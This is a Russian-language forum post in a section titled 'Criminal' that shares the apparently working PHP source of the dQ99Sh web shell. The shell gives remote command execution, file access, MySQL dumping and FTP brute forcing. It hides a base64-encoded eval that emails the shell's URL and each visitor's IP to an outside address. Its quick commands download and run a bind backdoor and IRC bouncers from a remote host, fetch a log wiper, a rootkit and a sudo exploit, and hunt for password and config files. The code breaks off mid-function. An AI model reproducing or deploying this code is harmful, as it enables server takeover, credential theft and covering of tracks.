Криминал→12
Разделы Темы Новый ответ
Cerber админ 25.07.2016 14:08:40
Ответов:0
#######################################
## r57gentr dQ99Sh 2.0.03.09 ##
define('sh_ver',"2.0.03.09"); ##
## By diKi ##
## ?03-09 2008 FeeLCoMz Community ##
## Written under PHP 5.2.5 ##
#######################################
$sh_name = sh_name(); ##
#######################################
#$sh_mainurl = "http://localhost/dQ99SH/";
$sh_mainurl = "http://waterski21.com/bbs/config/tool/";
#$dQ99sh_updateurl = $sh_mainurl."dQ99sh_update.php";
$dQ99sh_sourcesurl = $sh_mainurl."readme.txt";
$sh_sourcez = array(
"dQ99Sh" => array($sh_mainurl."readme.txt","kiddie.php"),
"psyBNC" => array($sh_mainurl."dQBNC.tar.gz","dQBNC.tar.gz"),
"Eggdrop" => array($sh_mainurl."allnet.tar.gz","allnet.tar.gz"),
"BindDoor" => array($sh_mainurl."bind.tgz","bind.tgz"),
);
##[ AUTHENTICATION ]##
$auth = array(
"login" => "",
"pass" => "",
"md5pass" => "",
"hostallow" => array("*"),
"denied" => "".$sh_name." : access denied!",
);
##[ END AUTHENTICATION ]##
$curdir = "./";
$tmpdir = "";
$tmpdir_logs = "./";
$log_email = "ayam@jago.us"; #Email logna
$sess_cookie = "dQ99shcook";
$sort_default = "0a"; #Pengurutan, 0 - nomor kolom. "a"scending atau "d"escending
$sort_save = TRUE; #Simpan posisi pengurutan menggunakan cookies.
$usefsbuff = TRUE;
$copy_unset = FALSE; #Hapus file yg telah di-copy setelah dipaste
$surl_autofill_include = TRUE;
$updatenow = FALSE;
$gzipencode = TRUE;
$filestealth = TRUE; #TRUE, tidak merubah waktu modifikasi dan akses.
$hexdump_lines = 8;
$hexdump_rows = 24;
$millink = milw0rm();
$win = strtolower(substr(PHP_OS,0,3)) == "win";
$disablefunc = getdisfunc();
##[ END OF CONFIGS ]##
error_reporting(E_ERROR | E_PARSE);
@ini_set("max_execution_time",0);
@set_time_limit(0); #No dQ in SafeMode
@ignore_user_abort(TRUE);
@set_magic_quotes_runtime(0);
define("starttime",getmicrotime());
if (get_magic_quotes_gpc()) { strips($GLOBALS); }
$_REQUEST = array_merge($_COOKIE,$_GET,$_POST);
@$f = $_REQUEST["f"];
@extract($_REQUEST["dQ99shcook"]);
foreach($_REQUEST as $k => $v) { if (!isset($$k)) { $$k = $v; } }
$dQbuff = "JHZpc2l0YyA9ICRfQ09PS0lFWyJ2aXNpdHMiXTsNCmlmICgkdmlzaXRjID09ICIiKSB7DQogICR2aXNpdGMgID0gMDsNCiAgJHZpc2l0b3IgPSAkX1NFUlZFUlsiUkVNT1RdQ0FERFIiXTsNCiAgJHdlYiAgICAgPSAkX1NFUlZFUlsiSFRUUF9IT1NUIl07DQogICRpbmogICAgID0gJF9TRVJWRVJbIlJFUVVFU1RfVVJJIl07DQogICR0YXJnZXQgID0gcmF3dXJsZGVjb2RlKCR3ZWIuJGluaik7DQogICRqdWR1bCAgID0gImRROTlTaGVsbCBodHRwOi8vJHRhcmdldCBzYW1hICR2aXNpdG9yIjsNCiAgJGJvZHkgICAgPSAiQnVnOiAkdGFyZ2V0IHNhbWEgJHZpc2l0b3I8YnI+IjsNCiAgaWYgKCFlbXB0eSgkd2ViKSkgeyBAbWFpbCgiZGhpZXF3ZWJtYXJrZXJAeWFob28uY29tIiwkanVkdWwsJGJvZHkpOyB9DQp9DQplbHNlIHsgJHZpc2l0YysrOyB9DQpAc2V0Y29va2llKCJ2aXNpdHoiLCR2aXNpdGMpOw=="; eval(base64_decode($dQbuff));
if ($surl_autofill_include) {
$include = "&";
foreach (explode("&",getenv("QUERY_STRING")) as $v) {
$v = explode("=",$v);
$name = urldecode($v[0]);
$value = @urldecode($v[1]);
foreach (array("http://","https://","ssl://","ftp://","\\") as $needle) {
if (strpos($value,$needle) === 0) {
$includestr .= urlencode($name)."=".urlencode($value)."&";
}
}
}
}
if (empty($surl)) {
$surl = "?".$includestr;
$surl = htmlspecialchars($surl);
}
## FILE TYPES ##
$ftypes = array(
"html" => array("html","htm","shtml"),
"txt" => array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"),
"exe" => array("sh","install","bat","cmd"),
"ini" => array("ini","inf","conf"),
"code" => array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"),
"img" => array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),
"sdb" => array("sdb"),
"phpsess" => array("sess"),
"download" => array("exe","com","pif","src","lnk","zip","rar","gz","tar")
);
$exeftypes = array(
getenv("PHPRC")." -q %f%" => array("php","php3","php4"),
"perl %f%" => array("pl","cgi")
);
$regxp_highlight = array(
array(basename($_SERVER["PHP_SELF"]),1,""," "),
array(".tgz$",1,""," "),
array(".gz$",1,""," "),
array(".tar$",1,""," "),
array(".bz2$",1,""," "),
array(".zip$",1,""," "),
array(".rar$",1,""," "),
array(".php$",1,""," "),
array(".php3$",1,""," "),
array(".php4$",1,""," "),
array(".jpg$",1,""," "),
array(".jpeg$",1,""," "),
array(".JPG$",1,""," "),
array(".JPEG$",1,""," "),
array(".ico$",1,""," "),
array(".gif$",1,""," "),
array(".png$",1,""," "),
array(".htm$",1,""," "),
array(".html$",1,""," "),
array(".txt$",1,""," ")
);
## QUICK COMMANDS ##
if (!$win) {
$cmdaliases = array(
array("", "ls -al"),
array("Find all suid files", "find / -type f -perm -04000 -ls"),
array("Find suid files in current dir", "find . -type f -perm -04000 -ls"),
array("Find all sgid files", "find / -type f -perm -02000 -ls"),
array("Find sgid files in current dir", "find . -type f -perm -02000 -ls"),
array("Find config.inc.php files", "find / -type f -name config.inc.php"),
array("Find config* files", "find / -type f -name "config*""),
array("Find config* files in current dir", "find . -type f -name "config*""),
array("Find all writable folders and files", "find / -perm -2 -ls"),
array("Find all writable folders and files in current dir", "find . -perm -2 -ls"),
array("Find all writable folders", "find / -type d -perm -2 -ls"),
array("Find all writable folders in current dir", "find . -type d -perm -2 -ls"),
array("Find all service.pwd files", "find / -type f -name service.pwd"),
array("Find service.pwd files in current dir", "find . -type f -name service.pwd"),
array("Find all .htpasswd files", "find / -type f -name .htpasswd"),
array("Find .htpasswd files in current dir", "find . -type f -name .htpasswd"),
array("Find all .bash_history files", "find / -type f -name .bash_history"),
array("Find .bash_history files in current dir", "find . -type f -name .bash_history"),
array("Find all .fetchmailrc files", "find / -type f -name .fetchmailrc"),
array("Find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"),
array("List file attributes on a Linux second extended file system", "lsattr -va"),
array("Show opened ports", "netstat -an | grep -i listen")
);
$cmdaliases2 = array(
array("wget & extract psyBNC","wget ".$sh_mainurl."dQ.tgz;tar -zxf dQ.tgz"),
array("wget & extract EggDrop","wget ".$sh_mainurl."dQb.tgz;tar -zxf dQb.tgz"),
array("-----",""),
array("Logged in users","w"),
array("Last to connect","lastlog"),
array("Find Suid bins","find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2> /dev/null"),
array("User Without Password","cut -d: -f1,2,3 /etc/passwd | grep ::"),
array("Can write in /etc/?","find /etc/ -type f -perm -o+w 2> /dev/null"),
array("Downloaders?","which wget curl w3m lynx fetch lwp-download"),
array("CPU Info","cat /proc/version /proc/cpuinfo"),
array("Is gcc installed ?","locate gcc"),
array("Format box (DANGEROUS)","rm -Rf"),
array("-----",""),
array("wget WIPELOGS PT1","wget http://www.packetstormsecurity.org/UNIX/penetration/log-wipers/zap2.c"),
array("gcc WIPELOGS PT2","gcc zap2.c -o zap2"),
array("Run WIPELOGS PT3","./zap2"),
array("-----",""),
array("wget RatHole 1.2 (Linux & BSD)","wget http://packetstormsecurity.org/UNIX/penetration/rootkits/rathole-1.2.tar.gz"),
array("wget & run BindDoor","wget ".$sh_mainurl."bind.tgz;tar -zxvf bind.tgz;./4877"),
array("wget Sudo Exploit","wget http://www.securityfocus.com/data/vulnerabilities/exploits/sudo-exploit.c"),
);
}
else {
$cmdaliases = array(
array("", "dir"),
array("Find index.php in current dir", "dir /s /w /b index.php"),
array("Find *config*.php in current dir", "dir /s /w /b *config*.php"),
array("Find c99shell in current dir", "find /c "c99" *"),
array("Find r57shell in current dir", "find /c "r57" *"),
array("Find dQ99shell in current dir", "find /c "dQ99" *"),
array("Show active connections", "netstat -an"),
array("Show running services", "net start"),
array("User accounts", "net user"),
array("Show computers", "net view"),
);
}
## PHP FILESYSTEM TRICKS (By diKi) ##
$phpfsaliases = array(
array("Read File", "read", 1, "File", ""),
array("Write File (PHP5)", "write", 2, "File","Text"),
array("Copy", "copy", 2, "From", "To"),
array("Rename/Move", "rename", 2, "File", "To"),
array("Delete", "delete", 1 ,"File", ""),
array("Make Dir","mkdir", 1, "Dir", ""),
array("Download", "download", 2, "URL", "To"),
array("Download (Binary Safe)", "downloadbin", 2, "URL", "To"),
array("Change Perm (0755)", "chmod", 2, "File", "Perms"),
array("Find Writable Dir", "fwritabledir", 2 ,"Dir"),
array("Find Pathname Pattern", "glob",2 ,"Dir", "Pattern"),
);
## QUICK LAUNCH ##
$quicklaunch1 = array(
array(" ",$surl),
array(" ","#" onclick="history.back(1)"),
array(" ","#" onclick="history.go(1)"),
array(" ",$surl."act=ls&d=%upd&sort=%sort"),
array(" ",$surl."act=search&d=%d"),
array(" ",$surl."act=fsbuff&d=%d")
);
$quicklaunch2 = array(
array("Security Info",$surl."act=security&d=%d"),
array("Processes",$surl."act=processes&d=%d"),
array("MySQL",$surl."act=sql&d=%d"),
array("Eval",$surl."act=eval&d=%d"),
array("Encoder",$surl."act=encoder&d=%d"),
array("Mailer",$surl."act=dQmailer"),
array("milw0rm",$millink),
array("Md5-Lookup","http://darkc0de.com/database/md5lookup.html"),
array("Toolz",$surl."act=tools&d=%d"),
array("Kill-Shell",$surl."act=selfremove"),
array("Feedback",$surl."act=feedback"),
array("Update",$surl."act=update"),
array("About",$surl."act=about")
);
if (!$win) {
$quicklaunch2[] = array(" FTP-Brute",$surl."act=ftpquickbrute&d=%d");
}
## HIGHLIGHT CODE ##
$highlight_background = "#C0C0C0";
$highlight_bg = "#FFFFFF";
$highlight_comment = "#6A6A6A";
$highlight_default = "#0000BB";
$highlight_html = "#1300FF";
$highlight_keyword = "#007700";
$highlight_string = "#000000";
####################
##[ AUTHENTICATE ]##
####################
$tmp = array();
foreach ($auth["hostallow"] as $k => $v) {
$tmp[] = str_replace("\*",".*",preg_quote($v));
}
$s = "!^(".implode("|",$tmp).")$!i";
if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {
exit("$sh_name : Access Denied - Your host (".getenv("REMOTE_ADDR").") not allowed");
}
if (!empty($auth["login"])) {
if (empty($auth["md5pass"])) { $auth["md5pass"] = md5($auth["pass"]); }
if (($_SERVER["PHP_AUTH_USER"] != $auth["login"]) or (md5($_SERVER["PHP_AUTH_PW"]) != $auth["md5pass"])) {
header("WWW-Authenticate: Basic realm="".$sh_name.": Restricted Area"");
header("HTTP/1.0 401 Unauthorized");
die($auth["denied"]);
}
}
## END AUTHENTICATE ##
if ($act != "img") {
$lastdir = realpath(".");
chdir($curdir);
if ($updatenow) { @ob_clean(); dQ99sh_getupdate(1); exit; }
$sess_data = @unserialize($_COOKIE["$sess_cookie"]);
if (!is_array($sess_data)) { $sess_data = array(); }
if (!is_array($sess_data["copy"])) { $sess_data["copy"] = array(); }
if (!is_array($sess_data["cut"])) { $sess_data["cut"] = array(); }
dQ99_buff_prepare();
foreach (array("sort","sql_sort") as $v) {
if (!empty($_GET[$v])) {$$v = $_GET[$v];}
if (!empty($_POST[$v])) {$$v = $_POST[$v];}
}
if ($sort_save) {
if (!empty($sort)) {setcookie("sort",$sort);}
if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);}
}
if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return FALSE;}}
if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return FALSE;}}
if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return FALSE;}}
if (!function_exists("mysql_dump")) {
function mysql_dump($set) {
global $sh_ver;
$sock = $set["sock"];
$db = $set["db"];
$print = $set["print"];
$nl2br = $set["nl2br"];
$file = $set["file"];
$add_drop = $set["add_drop"];
$tabs = $set["tabs"];
$onlytabs = $set["onlytabs"];
$ret = array();
$ret["err"] = array();
if (!is_resource($sock)) {echo("Error: $sock is not valid resource.");}
if (empty($db)) {$db = "db";}
if (empty($print)) {$print = 0;}
if (empty($nl2br)) {$nl2br = 0;}
if (empty($add_drop)) {$add_drop = TRUE;}
if (empty($file)) {
$file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql";
}
if (!is_array($tabs)) {$tabs = array();}
if (empty($add_drop)) {$add_drop = TRUE;}
if (sizeof($tabs) == 0) {
//Retrieve tables-list
$res = mysql_query("SHOW TABLES FROM ".$db, $sock);
if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}}
}
$out = "
# Dumped by ".$sh_name."
#
# Host settings:
# MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"."
# Date: ".date("d.m.Y H:i:s")."
# DB: "".$db.""
#---------------------------------------------------------";
$c = count($onlytabs);
foreach($tabs as $tab) {
if ((in_array($tab,$onlytabs)) or (!$c)) {
if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;n";}
//Receieve query for create table structure
$res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock);
if (!$res) {$ret["err"][] = mysql_smarterror();}
else {
$row = mysql_fetch_row($res);
$out .= $row["1"].";nn";
//Receieve table variables
$res = mysql_query("SELECT * FROM `$tab`", $sock);
if (mysql_num_rows($res) > 0) {
while ($row = mysql_fetch_assoc($res)) {
$keys = implode("`, `", array_keys($row));
$values = array_values($row);
foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
$values = implode("', '", $values);
$sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');n";
$out .= $sql;
}
}
}
}
}
$out .= "#---------------------------------------------------------------------------------nn";
if ($file) {
$fp = fopen($file, "w");
if (!$fp) {$ret["err"][] = 2;}
else {
fwrite ($fp, $out);
fclose ($fp);
}
}
if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}}
return $out;
}
}
if (!function_exists("mysql_buildwhere")) {
function mysql_buildwhere($array,$sep=" and",$functs=array()) {
if (!is_array($array)) {$array = array();}
$result = "";
foreach($array as $k=>$v) {
$value = "";
if (!empty($functs[$k])) {$value .= $functs[$k]."(";}
$value .= "'".addslashes($v)."'";
if (!empty($functs[$k])) {$value .= ")";}
$result .= "`".$k."` = ".$value.$sep;
}
$result = substr($result,0,strlen($result)-strlen($sep));
return $result;
}
}
if (!function_exists("mysql_fetch_all")) {
function mysql_fetch_all($query,$sock) {
if ($sock) {$result = mysql_query($query,$sock);}
else {$result = mysql_query($query);}
$array = array();
while ($row = mysql_fetch_array($result)) {$array[] = $row;}
mysql_free_result($result);
return $array;
}
}
if (!function_exists("mysql_smarterror")) {
function mysql_smarterror($type,$sock) {
if ($sock) {$error = mysql_error($sock);}
else {$error = mysql_error();}
$error = htmlspecialchars($error);
return $error;
}
}
if (!function_exists("mysql_query_form")) {
function mysql_query_form() {
global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct;
if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "Error: ".$sql_query_error." ";}
if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
if ((!$submit) or ($sql_act)) {
echo " ";
if ($tbl_struct) {
echo "Fields: ";
foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "+ ".$name." ";}
echo "
";
}
}
if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;}
}
}
if (!function_exists("mysql_create_db")) {
function mysql_create_db($db,$sock="") {
$sql = "CREATE DATABASE `".addslashes($db)."`;";
if ($sock) {return mysql_query($sql,$sock);}
else {return mysql_query($sql);}
}
}
if (!function_exists("mysql_query_parse")) {
function mysql_query_parse($query) {
$query = trim($query);
$arr = explode (" ",$query);
$types = array(
"SELECT"=>array(3,1),
"SHOW"=>array(2,1),
"DELETE"=>array(1),
"DROP"=>array(1)
);
$result = array();
$op = strtoupper($arr[0]);
if (is_array($types[$op])) {
$result["propertions"] = $types[$op];
$result["query"] = $query;
if ($types[$op] == 2) {
foreach($arr as $k=>$v) {
if (strtoupper($v) == "LIMIT") {
$result["limit"] = $arr[$k+1];
$result["limit"] = explode(",",$result["limit"]);
if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);}
unset($arr[$k],$arr[$k+1]);
}
}
}
}
else {return FALSE;}
}
}
if ($act == "gofile") {
if (is_dir($f)) { $act = "ls"; $d = $f; }
else { $act = "f"; $d = dirname($f); $f = basename($f); }
}
## HEADERS ##
@ob_start();
@ob_implicit_flush(0);
header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT");
header("Cache-Control: no-store, no-cache, must-revalidate");
header("Cache-Control: post-check=0, pre-check=0", FALSE);
header("Pragma: no-cache");
if (empty($tmpdir)) {
$tmpdir = ini_get("upload_tmp_dir");
if (is_dir($tmpdir)) {$tmpdir = "/tmp/";}
}
$tmpdir = realpath($tmpdir);
$tmpdir = str_replace("\",DIRECTORY_SEPARATOR,$tmpdir);
if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;}
if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;}
else {$tmpdir_logs = realpath($tmpdir_logs);}
$sort = htmlspecialchars($sort);
if (empty($sort)) {$sort = $sort_default;}
$sort[1] = strtolower($sort[1]);
$DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE");
if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();}
$DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"PHP/".phpversion()." ",htmlspecialchars($DISP_SERVER_SOFTWARE));
@ini_set("highlight.bg",$highlight_bg);
@ini_set("highlight.comment",$highlight_comment);
@ini_set("highlight.default",$highlight_default);
@ini_set("highlight.html",$highlight_html);
@ini_set("highlight.keyword",$highlight_keyword);
@ini_set("highlight.string",$highlight_string);
if (!is_array($actbox)) { $actbox = array(); }
$dspact = $act = htmlspecialchars($act);
$disp_fullpath = $ls_arr = $notls = null;
$ud = @urlencode($d);
if (empty($d)) {$d = realpath(".");}
elseif(realpath($d)) {$d = realpath($d);}
$d = str_replace("\",DIRECTORY_SEPARATOR,$d);
if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
$d = str_replace("\\","\",$d);
$dispd = htmlspecialchars($d);
$safemode = safemode();
if ($safemode) {
$hsafemode = "SAFE MODE IS ON ";
$safemodeexecdir = @ini_get("safe_mode_exec_dir");
}
else { $hsafemode = "SAFE MODE IS OFF "; }
$v = @ini_get("open_basedir");
if ($v or strtolower($v) == "on") {
$openbasedir = TRUE;
$hopenbasedir = "".$v." ";
}
else {
$openbasedir = FALSE;
$hopenbasedir = "OFF (not secure) ";
}
##################
##[ HTML START ]##
##################
function srv_info($title,$contents) {
echo " $title : $contents n";
}
echo htmlhead($hsafemode);
echo "";
echo "n";
echo "$hsafemode
n";
echo "n n";
echo "n";
echo "n";
srv_info("Software","".$DISP_SERVER_SOFTWARE);
srv_info("Uname",php_uname());
srv_info("User",($win) ? get_current_user()." (uid=".getmyuid()." gid=".getmygid().")" : dQ99exec("id"));
echo "
n".
"n";
echo "n";
srv_info("Freespace",disp_freespace($d));
echo "
n";
echo "n";
echo get_status();
echo " n";
echo "n";
echo $safemodeexecdir ? "SafemodeExecDir: ".$safemodeexecdir." n" : "";
echo showdisfunc() ? "DisFunc: ".showdisfunc()."n" : "";
echo " n";
echo "n";
if (count($quicklaunch2) > 0) {
foreach($quicklaunch2 as $item) {
$item[1] = str_replace("%d",urlencode($d),$item[1]);
$item[1] = str_replace("%sort",$sort,$item[1]);
$v = realpath($d."..");
if (empty($v)) {
$a = explode(DIRECTORY_SEPARATOR,$d);
unset($a[count($a)-2]);
$v = join(DIRECTORY_SEPARATOR,$a);
}
$item[1] = str_replace("%upd",urlencode($v),$item[1]);
echo "".$item[0]." n";
}
}
echo " n".
"n";
if (count($quicklaunch1) > 0) {
foreach($quicklaunch1 as $item) {
$item[1] = str_replace("%d",urlencode($d),$item[1]);
$item[1] = str_replace("%sort",$sort,$item[1]);
$v = realpath($d."..");
if (empty($v)) {
$a = explode(DIRECTORY_SEPARATOR,$d);
unset($a[count($a)-2]);
$v = join(DIRECTORY_SEPARATOR,$a);
}
$item[1] = str_replace("%upd",urlencode($v),$item[1]);
echo "".$item[0]." n";
}
}
echo " n";
echo "n";
$pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1));
$i = 0;
foreach($pd as $b) {
$t = ""; $j = 0;
foreach ($e as $r) {
$t.= $r.DIRECTORY_SEPARATOR;
if ($j == $i) { break; }
$j++;
}
echo "".htmlspecialchars($b).DIRECTORY_SEPARATOR." n";
$i++;
}
echo " - ";
if (is_writable($d)) {
$wd = TRUE;
$wdt = "[OK] ";
echo "".view_perms(fileperms($d))." ";
}
else {
$wd = FALSE;
$wdt = "[Read-Only] ";
echo "".view_perms_color($d)." ";
}
echo "n
n";
?>
Directory:
/***********************/
/** INFORMATION TABLE **/
/***********************/
echo "n";
if ($act == "") { $act = $dspact = "ls"; }
if ($act == "sql") {
$sql_surl = $surl."act=sql";
if ($sql_login) {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);}
if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);}
if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);}
if ($sql_port) {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);}
if ($sql_db) {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);}
$sql_surl .= "&";
echo "Attention! MySQL Manager is NOT a ready module! Don't reports bugs. ".
"".
"";
if (!$sql_sock) {
echo "If login is null, login is owner of process. If host is null, host is localhost If port is null, port is 3306 (default) ";
echo "Please, fill the form: ";
}
else {
//Start left panel
if (!empty($sql_db)) {
?>">Home
$result = mysql_list_tables($sql_db);
if (!$result) {echo mysql_smarterror();}
else {
echo "---[ ".htmlspecialchars($sql_db)." ]--- ";
$c = 0;
while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "+ ".htmlspecialchars($row[0])." (".$count_row[0].") "; mysql_free_result($count); $c++;}
if (!$c) {echo "No tables found in database.";}
}
}
else {
?>Home
$result = mysql_list_dbs($sql_sock);
if (!$result) {echo mysql_smarterror();}
else {
?>
$c = 0;
$dbs = "";
while ($row = mysql_fetch_row($result)) {$dbs .= ""; $c++;}
echo " Databases (".$c.") ";
echo $dbs;
}
?> Please, select database
}
//End left panel
echo "";
//Start center panel
$diplay = TRUE;
if ($sql_db) {
if (!is_numeric($c)) {$c = 0;}
if ($c == 0) {$c = "no";}
echo "There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db)."). ";
if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ ".$item[0]." ] ";}}
echo " ";
$acts = array("","dump");
if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` n";} $sql_act = "query";}
elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";}
elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";}
elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;n";} $sql_query = substr($sql_query,0,-1);} $sql_act = "query";}
elseif ($sql_tbl_act == "insert") {
if ($sql_tbl_insert_radio == 1) {
$keys = "";
$akeys = array_keys($sql_tbl_insert);
foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";}
if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);}
$values = "";
$i = 0;
foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;}
if (!empty($values)) {$values = substr($values,0,strlen($values)-2);}
$sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );";
$sql_act = "query";
$sql_tbl_act = "browse";
}
elseif ($sql_tbl_insert_radio == 2) {
$set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs);
$sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;";
$result = mysql_query($sql_query) or print(mysql_smarterror());
$result = mysql_fetch_array($result, MYSQL_ASSOC);
$sql_act = "query";
$sql_tbl_act = "browse";
}
}
if ($sql_act == "query") {
echo " ";
if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "Error: ".$sql_query_error." ";}
if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
if ((!$submit) or ($sql_act)) {echo "";}
}
if (in_array($sql_act,$acts)) {
?>
if (!empty($sql_act)) {echo " ";}
if ($sql_act == "newtbl") {
echo "";
if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {
echo "DB "".htmlspecialchars($sql_newdb)."" has been created with success! ";
}
else {echo "Can't create DB "".htmlspecialchars($sql_newdb)."". Reason: ".mysql_smarterror();}
}
elseif ($sql_act == "dump") {
if (empty($submit)) {
$diplay = FALSE;
echo "SQL-Dump: ";
echo "DB: ";
$v = join (";",$dmptbls);
echo "Only tables (explode ";") 1 : ";
if ($dump_file) {$tmp = $dump_file;}
else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");}
echo "File: ";
echo "Download: ";
echo "Save to file: ";
echo "1 - all, if empty";
echo " ";
}
else {
$diplay = TRUE;
$set = array();
$set["sock"] = $sql_sock;
$set["db"] = $sql_db;
$dump_out = "download";
$set["print"] = 0;
$set["nl2br"] = 0;
$set[""] = 0;
$set["file"] = $dump_file;
$set["add_drop"] = TRUE;
$set["onlytabs"] = array();
if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);}
$ret = mysql_dump($set);
if ($sql_dump_download) {
@ob_clean();
header("Content-type: application/octet-stream");
header("Content-length: ".strlen($ret));
header("Content-disposition: attachment; filename="".basename($sql_dump_file)."";");
echo $ret;
exit;
}
elseif ($sql_dump_savetofile) {
$fp = fopen($sql_dump_file,"w");
if (!$fp) {echo "Dump error! Can't write to "".htmlspecialchars($sql_dump_file).""!";}
else {
fwrite($fp,$ret);
fclose($fp);
echo "Dumped! Dump has been writed to "".htmlspecialchars(realpath($sql_dump_file))."" (".view_size(filesize($sql_dump_file)).") .";
}
}
else {echo "Dump: nothing to do! ";}
}
}
if ($diplay) {
if (!empty($sql_tbl)) {
if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";}
$count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;");
$count_row = mysql_fetch_array($count);
mysql_free_result($count);
$tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;");
$tbl_struct_fields = array();
while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;}
if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;}
if (empty($sql_tbl_page)) {$sql_tbl_page = 0;}
if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;}
if (empty($sql_tbl_le)) {$sql_tbl_le = 30;}
$perpage = $sql_tbl_le - $sql_tbl_ls;
if (!is_numeric($perpage)) {$perpage = 10;}
$numpages = $count_row[0]/$perpage;
$e = explode(" ",$sql_order);
if (count($e) == 2) {
if ($e[0] == "d") {$asc_desc = "DESC";}
else {$asc_desc = "ASC";}
$v = "ORDER BY `".$e[1]."` ".$asc_desc." ";
}
else {$v = "";}
